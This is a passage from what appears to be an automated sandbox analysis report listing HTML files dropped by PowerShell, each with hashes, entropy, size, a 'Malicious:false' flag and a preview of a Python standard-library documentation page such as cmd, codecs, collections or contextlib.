                                                                                                                                                                                                              SHA1:36392B2BBFA9A925F98B20EF1251C5D0B9B8C727
                                                                                                                                                                                                              SHA-256:2E1B0118A2A3743B4570FDA4D852680C145F02A03C3A82710160E077A29A785C
                                                                                                                                                                                                              SHA-512:62FF43E8D67AF3945A41348F46DA2487091CBC7A2A21548AAEC1446C03E91BE3211D27DFAA7C4AE35DC28FCA029F22C3AAAFEA9D0AB9E8C9780EE026018DD4DF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="cmd . Support for line-oriented command interpreters" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/cmd.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/cmd.py The Cmd class provides a simple framework for writing line-oriented command interpreters. These are often useful for test harnesses, administrative tools, and prototypes tha..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/cmd.py The Cm
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22366
                                                                                                                                                                                                              Entropy (8bit):4.8611949607514395
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:JXXHqklxxJnZTMY35Bt5/gwOHMXnNTMZ76zqWTC:JX3qyxnNMmBHOH05MZ762/
                                                                                                                                                                                                              MD5:83C1D63C712CCC4EB6C1037CF78CFC40
                                                                                                                                                                                                              SHA1:DA4B1D23F0FF18AA140940DE886DA1A9AD72E82F
                                                                                                                                                                                                              SHA-256:BF1E9501F008B0E65935511E956B9E19FDE1C8FA77F8CCE7305592539A4D52E4
                                                                                                                                                                                                              SHA-512:B4386762E4D4CBA635FB786BA40517AE575733F87FC28C31F8B7B13744B114623144BDEC0EBF09019E9320327EF358B1F03F9D514455070BA12BDE87FFC8C146
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Modules command-line interface (CLI)" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/cmdline.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The following modules have a command-line interface. ast, asyncio, base64, calendar, code, compileall, cProfile: see profile, difflib, dis, doctest, encodings.rot_13, ensurepip, filecmp, fileinput,..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The following modules have a command-line in
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1083), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39288
                                                                                                                                                                                                              Entropy (8bit):4.823594420803517
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:CqyBd5M4t8FYyFne+YyFCyt2FWyF9yFcyFSyFhoxItCyeDyg++KXtCyeDyg+3475:Cqy9M4t8FYyFe+YyFCyt2FWyF9yFcyF4
                                                                                                                                                                                                              MD5:CC434A1AEDF39C8A65BB2DC7F2C0EA09
                                                                                                                                                                                                              SHA1:4F8963B14A9BF2C2F86D38BFC54C6CDBA09AE2C3
                                                                                                                                                                                                              SHA-256:2180B0506079A89A0A7FFF0BA59E0D4F064F6A83F607E3CE41987ACE4F370418
                                                                                                                                                                                                              SHA-512:BFE3905604B86B802A3C3F4906DECA657F51105F55726EFB1C02E72FD64DB440824928A12B6C6199AF0C8FF6CF57B2B445FA731CC3E048BE13163D2E6D92B3A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="code . Interpreter base classes" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/code.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/code.py The code module provides facilities to implement read-eval-print loops in Python. Two classes and convenience functions are included which can be used to build applications..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/code.py The code module provides
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1563), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):166970
                                                                                                                                                                                                              Entropy (8bit):4.8915545416584205
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:Lv5TeCfm8+JH/CQbZg+s028L21YzY8CxMW6UA:LvdeCfm8+JH/CQbZg+j2PjMW6UA
                                                                                                                                                                                                              MD5:D71C608E629CDAA5E291AD5EC6F4ADD1
                                                                                                                                                                                                              SHA1:6D4334114343E744907459AA80F9F1D5B3280E40
                                                                                                                                                                                                              SHA-256:48A721A500B2518238593A409B4CF23B838463E7B9D46BF9F50BA17FDC3CDDA7
                                                                                                                                                                                                              SHA-512:CB33FA89EE0CEA44AF72C5B45169E0FF950B7D3F2F92ACEF76EB625CC2B50BB65548DE5C394D405061EA2C15F82AD65358AA849F0BF47284C6677EE7E900FE05
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="codecs . Codec registry and base classes" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/codecs.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/codecs.py This module defines base classes for standard Python codecs (encoders and decoders) and provides access to the internal Python codec registry, which manages the codec and..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/codecs.py This module
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (807), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21743
                                                                                                                                                                                                              Entropy (8bit):4.867491153399969
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:kavHqkl/PhnLTMGNKbe1O4UgbQyItCyeDyg+uN/ikhNage4XvqKfnHTM9x76zqWG:dqy/JvMhLGItCyeDyg+uNqYwge4XSqzy
                                                                                                                                                                                                              MD5:00051FC0665809115138232766563997
                                                                                                                                                                                                              SHA1:63856281D8DFA4E83EDEA829F1AEB923138791AD
                                                                                                                                                                                                              SHA-256:5EBB1102DD8D07B84886084E683CE90C64B98B3144C3C90D6C52D83B41F537DE
                                                                                                                                                                                                              SHA-512:113B335FF1D851161857053C20722552092B3914392494FE1F7FF35BB0AA82DBE1B0B9574CEE57FF555DB19FA274C17907BDB182EC0464441ABAA9E608631A86
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="codeop . Compile Python code" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/codeop.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/codeop.py The codeop module provides utilities upon which the Python read-eval-print loop can be emulated, as is done in the code module. As a result, you probably don.t want to us..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/codeop.py The codeop module prov
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (660), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):92229
                                                                                                                                                                                                              Entropy (8bit):4.79329225120484
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:LqyQMudAF5yeIWZ/XHiEB8TB8Iy87QUmb1wcL6dBBTb5o28nyZgZe80gkGFzIlGh:oAFPZPiEB8TB85STASgN2GELOySMhEyM
                                                                                                                                                                                                              MD5:5FC897073D3D509B7D6F63BEA583FD60
                                                                                                                                                                                                              SHA1:24866A152F25F43BA9923A7B8811BDD23A0C3C25
                                                                                                                                                                                                              SHA-256:C95703BAFB7C1D80BE77C36EC1097D490DB6C0900CDCA3AB989730F355AB0023
                                                                                                                                                                                                              SHA-512:3D4D906AC0C32558F62DAAB97E62850ABB88471691E577770E0A34FE5F5CE80FADE844C29B7410C7E7DCE93B366D86458E434330FA7014AEA490C18080CCB1DB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="collections.abc . Abstract Base Classes for Containers" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/collections.abc.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/_collections_abc.py This module provides abstract base classes that can be used to test whether a class provides a particular interface; for example, whether it is hashable or whet..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (636), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):198452
                                                                                                                                                                                                              Entropy (8bit):4.7711703815065345
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:z/cqyDMos6+myNBRH1yFo10SqOPwDFN0jyVXnJjPVjoZWB3i9WL3TnL/iAyAG4qB:Mw6QO/jTA
                                                                                                                                                                                                              MD5:D906E8873A46A83818EAA2BBC5DD6885
                                                                                                                                                                                                              SHA1:ADAAD732755ACC21A43331DFBB50CB8DDC66CF44
                                                                                                                                                                                                              SHA-256:129A21529051B1AAA72A615AD97B11E9801E6D6CEE685EFF18349687D7CB581A
                                                                                                                                                                                                              SHA-512:B20A56C27D0740AFC2F2CD316558E00F401F489EB668E8D79845E922AE37D40F3CC2D9DEE712C9526C9EDF69B5D8ED61E45C6A31DC12615531BBCB3319F4143A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="collections . Container datatypes" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/collections.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/collections/__init__.py This module implements specialized container datatypes providing alternatives to Python.s general purpose built-in containers, dict, list, set, and tuple.,,..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/collections/__init__.p
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (543), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20541
                                                                                                                                                                                                              Entropy (8bit):4.890422836772641
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qocHqklatQn3TMsbdK3EcChJ0ZUsJ0cChpoe7mtccChF8em9WXoAnTTMv76zqWTC:yqyaWjMspEEcChJ0ZUsJ0cChpoe7mtcQ
                                                                                                                                                                                                              MD5:7E4BE331CE0B5DB2D9CE429490A57C5F
                                                                                                                                                                                                              SHA1:1C20CCFBAE8F4AC0A38F56AEFD8577C1EC0DAD77
                                                                                                                                                                                                              SHA-256:234CEA2D4DE0281E4D7CD41B591CB28520B4B5EB558484DAE2D4199E23EB023E
                                                                                                                                                                                                              SHA-512:2913F257F29C16BB0B3462C382D9DBCEB0C73BE4427D7C0094C0DEF3B0CAE283B0A079E2A300B563F38386F072210B40971AF05F781947A08A577A0B0540829D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="colorsys . Conversions between color systems" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/colorsys.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/colorsys.py The colorsys module defines bidirectional conversions of color values between colors expressed in the RGB (Red Green Blue) color space used in computer monitors and thr..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/colorsys.py The
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3065), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):55499
                                                                                                                                                                                                              Entropy (8bit):4.803176764842073
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:KqyXMG3YeYPrWZpOLZhmhVPAN/ZwgnNi8AhB2TFmBOyU8yFMyYZyFHyL8yYt+yZU:+CQqYrbbnmA
                                                                                                                                                                                                              MD5:0E90021CD1C2FDF9DC528B017720192C
                                                                                                                                                                                                              SHA1:6D14127EDBED16E9E435435BEF599F3E6C8E797D
                                                                                                                                                                                                              SHA-256:26E3BA15DF92B0AFE60CE77AB5785EF0C22D7B9035A3FE0024971514AB51C860
                                                                                                                                                                                                              SHA-512:CCDC56ED5539697DD57DD5580F594AB03427FED603BEB1E77D2D7C143A824446E9EDED0B8543E469F5F347BD820D396BCCDA7C4875196543FB737007EDEF21EE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="compileall . Byte-compile Python libraries" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/compileall.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/compileall.py This module provides some utility functions to support installing Python libraries. These functions compile Python source files in a directory tree. This module can b..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/compileall.py Th
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (443), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27951
                                                                                                                                                                                                              Entropy (8bit):4.873879487587195
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:bNNUHqklkxEKlnxTMSLtwAelM1SaC90GIWZxpKrnFTMVX76zqWTC:Qqy8t1M6ylM108BMR762/
                                                                                                                                                                                                              MD5:AB9B2430C64F9727608EAA00F577F285
                                                                                                                                                                                                              SHA1:6E8BE7ACFE19DE38BAF3A57A5DF6AC198B59EFE9
                                                                                                                                                                                                              SHA-256:6FB942209E7362DD4848B3610E9865ED2B9E43D52644E25D229FA2DE271266CB
                                                                                                                                                                                                              SHA-512:8ED7B933280D7CE73E6E2A5EFCD759F94380FB22E58733E297703D22D2BFA6FE9F2130175B13A0806F8EF692517FEBAF253B497A56E5BBC710DC9A6C310B9874
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Concurrent Execution" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/concurrency.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter provide support for concurrent execution of code. The appropriate choice of tool will depend on the task to be executed (CPU bound vs IO bound) and preferred s..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter provide support fo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1434), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):90388
                                                                                                                                                                                                              Entropy (8bit):4.820529512303966
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:uqyAMPzWfwk/wHo1sCkwP4yFvyQhdyTwKyYBIPe0syFkylvyFoykzsskGtsyFOys:DFKYBkMuPsA
                                                                                                                                                                                                              MD5:782B3AD291B1B8B6486E293DF44B94B7
                                                                                                                                                                                                              SHA1:51F198A736798EF7E7047B6EF95DD025356632FC
                                                                                                                                                                                                              SHA-256:23D5A307137F5B91A9C151732D4B0FB0D21B85FF2ECC6D1E638ACCBCD7334EA2
                                                                                                                                                                                                              SHA-512:9C6907AE920D35898232BAF72244E88BF54F1BEDB1D50879B1EC0FB665F13082F571B1B03705D1E2F0BBC21A9147604AA947BF27614D02F891061F84C594E570
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="concurrent.futures . Launching parallel tasks" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/concurrent.futures.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/concurrent/futures/thread.py and Lib/concurrent/futures/process.py The concurrent.futures module provides a high-level interface for asynchronously executing callables. The asynchr..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/concu
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14413
                                                                                                                                                                                                              Entropy (8bit):4.83267684973872
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:k2IcHqkltLAaPnATMmt0LVapnWTMf076zqWTC:k2IAqytL7POM40Lgp8Ms762/
                                                                                                                                                                                                              MD5:572F278009995634BFEFF5FFA7AED80F
                                                                                                                                                                                                              SHA1:00F3E9352E7176D0A7C4777219AD87E64B8BFCB2
                                                                                                                                                                                                              SHA-256:062A1AFFD81ACFBD9F5CC25F4383B5C8C13F9E0153837EB3A911288C02DAB05C
                                                                                                                                                                                                              SHA-512:B426CE80DF4D91990779CDCD6E2A43567E138495C2E476CBDE1FFE8FFE91CCF0401DC97EA647A19C137A3E63E4580627750D3BF12033BE09435F3B9E567AD206
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The concurrent package" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/concurrent.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Currently, there is only one module in this package: concurrent.futures . Launching parallel tasks." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Currently, there is only one module in this package: concurrent.futures . Launching parallel tasks." />..<meta property="og:image:width" content="200" /
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (497), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):166828
                                                                                                                                                                                                              Entropy (8bit):4.850296442700908
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ZyyQvqysMLd8IB/zcPbH6hPXOBP+B63LfK9wBVQcT/2Js1oqyh/QiCI9T6f+myF9:qAtgczw6uDN5jYYGm4E2WKYKqfd2hA
                                                                                                                                                                                                              MD5:B8CE7BBA063734014B6B2C954ACB6150
                                                                                                                                                                                                              SHA1:E672E21EA234DE39BFB74234DE01B6B3EC4799EF
                                                                                                                                                                                                              SHA-256:979100FE4D3D102CAF0BA5176479C0BA22AAE5A1A555BB8ED8ABD043ED28B849
                                                                                                                                                                                                              SHA-512:B25C75BDFBF30C375779D19D63B307C1FAFE2395866C8F18B5E901F45DB1E42B45F7111912192A879905AE0DA0C28AFA05C8125B40F0CC6FCA2CEA062A71DAFF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="configparser . Configuration file parser" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/configparser.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/configparser.py This module provides the ConfigParser class which implements a basic configuration language which provides a structure similar to what.s found in Microsoft Windows ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/configparser.p
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (838), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):26502
                                                                                                                                                                                                              Entropy (8bit):4.860270568862927
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:mqywIsM3XG1oiBOfNVO5yFE5yFgSz75aM7762/:mqysM3XG1oL1VO5yFE5yFgSzoM7762/
                                                                                                                                                                                                              MD5:B80AA502C1CCBA7A7C83E8FDADDB2D84
                                                                                                                                                                                                              SHA1:178EC94E00135019C93E99024E487200F75C2635
                                                                                                                                                                                                              SHA-256:6664D92C0EB827E5CBCF8EB42A4F3AE6F5E388ADC85750C5EBDC585CCC446A58
                                                                                                                                                                                                              SHA-512:381F3BC6D86471C80A375844D31B45FE4594873F8C8CD5E03B41F3BBD27DC85C0CB1691C1340ABCE48FA0E3E8C6677108AD2E311957363B204C2ED21DEE06F18
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Built-in Constants" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/constants.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A small number of constants live in the built-in namespace. They are: Constants added by the site module: The site module (which is imported automatically during startup, except if the-S command-li..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A small number of constants live in the built-in namespace.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (565), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):130619
                                                                                                                                                                                                              Entropy (8bit):4.76732622302463
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:MqyvMrVbLz3nDM1NfahB3MBUL138pcOT8OkxOfyJr2yFV3xR7eINgOPTVaQsbfSN:f7CmBjL1mYFnbnTQpA
                                                                                                                                                                                                              MD5:3E915643BEC79828277FC142246E5989
                                                                                                                                                                                                              SHA1:60797AFF1E8DCBD813C05E1E8AAB5C868F6F8DF4
                                                                                                                                                                                                              SHA-256:66AB3797F70E5DBD293F91DEFBA45A13917CCB098CDC00E33822580A2D16DFDE
                                                                                                                                                                                                              SHA-512:8728784A1BFE4C223FC14A762BA90D109A76FB9C32A22C1479E82C3893033F4C5DEBF25A6E3ADD6C171B01B54B967F1EC242AE04FCF2DE5CF67EA3646EF714CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="contextlib . Utilities for with-statement contexts" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/contextlib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/contextlib.py This module provides utilities for common tasks involving the with statement. For more information see also Context Manager Types and With Statement Context Managers...." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/contextl
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (700), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):42353
                                                                                                                                                                                                              Entropy (8bit):4.881199623216228
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:mqyn+8MFX63bwSbk/K4bPp3oqqWuNYC2WPfAZGowHo1Imo+yL/vzA1SK4JrXLqMT:mqyPMk3bwSbk/K4bPp3oqqWuaC2WPfAC
                                                                                                                                                                                                              MD5:EC71FD29ED2457D8D022C96B4411F7E6
                                                                                                                                                                                                              SHA1:3006E28D438481A6B5054BF8101FF7E0767D57D1
                                                                                                                                                                                                              SHA-256:8D869E00E05BF4811A356299FFCC5A064E1B0F3705DD998C3FBEF17F50F2A9BC
                                                                                                                                                                                                              SHA-512:1D0EEFE521323CAC8A0251D8BFBCE90B022E8B9C67806B82780273022861A6ECBBCD19688A2CB67B77791815F4791FF42220CC5CAB28CEA115C53ED62665C64B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="contextvars . Context Variables" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/contextvars.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module provides APIs to manage, store, and access context-local state. The ContextVar class is used to declare and work with Context Variables. The copy_context() function and the Context clas..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module provides APIs to manage, store,
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (518), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21197
                                                                                                                                                                                                              Entropy (8bit):4.843064468375823
                                                                                                                                                                                                              Encrypted:false
